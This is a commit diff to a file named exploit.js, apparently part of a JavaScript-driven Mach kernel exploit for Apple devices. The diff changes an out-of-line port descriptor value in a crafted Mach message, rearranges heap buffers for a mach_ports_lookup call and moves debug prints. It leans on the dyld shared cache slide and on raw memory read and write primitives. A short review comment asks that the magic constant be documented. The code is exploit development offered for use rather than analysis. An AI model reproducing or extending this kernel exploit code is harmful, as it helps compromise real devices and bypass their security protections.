authorspv420 <spv@spv.sh>2022-07-15 15:03:50 -0400
committerspv420 <spv@spv.sh>2022-07-15 15:03:50 -0400
commit42647b796f0f54122e7f46522d8e681825daf54b (patch)
tree6886bfea221b15579b84ff13d1b850a1ac9f5fcf /src/js/kexp
parentd1da310f02adc0e9b5f8656ea063fd3231901611 (diff)
dump
Diffstat (limited to 'src/js/kexp')
-rwxr-xr-xsrc/js/kexp/exploit.js8
1 files changed, 5 insertions, 3 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 8447c46..473bc6e 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -330,7 +330,7 @@ function r3gister(task, init_port_set, real_count, fake_count) {
write_u32(InP + 0x18, 1);
write_u32(InP + 0x1c, init_port_set);
write_u32(InP + 0x20, real_count);
- write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
+ write_u32(InP + 0x24, 0x0213c600);
write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0));
write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4));
write_u32(InP + 0x30, fake_count);
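Review bot: The new line `write_u32(InP + 0x24, 0x0213c600);` replaces a symbolic expression with a bare literal and the derivation is lost; the top two bytes still appear to correspond to the removed `(MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)` and `(19 << 16)` terms, but the low 16 bits `0xc600` were zero in the old expression and nothing on the page records what they encode. Keep the expression form where it still holds and comment the remainder, e.g. `write_u32(InP + 0x24, (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24) | (19 << 16) | 0xc600); // TODO: name what the low 16 bits (0xc600) encode`. The enclosing function r3gister starts outside this hunk.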
@@ -349,8 +349,10 @@ function r3gister(task, init_port_set, real_count, fake_count) {
function mach_ports_lookup_shit() {
printf("fuck\n");
var arrz = shit_heap(4);
+ var arrz2 = shit_heap(4);
printf("fuck\n");
- write_u32(arrz, 0);
+ write_u32(arrz, arrz2);
+ write_u32(arrz2, 0);
printf("fuck\n");
var sz = shit_heap(4);;
printf("fuck\n");
@@ -359,6 +361,7 @@ function mach_ports_lookup_shit() {
// var mts = mach_task_self();
printf("fuck\n");
calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
+ scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
printf("mpl success\n");
return read_u32(read_u32(arrz) + 8);
@@ -461,7 +464,6 @@ again: while (true) {
// while (true) {
//
// }
- scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
printf("fuck\n");
// var fake_port = read_u32(read_u32(arrz) + 8);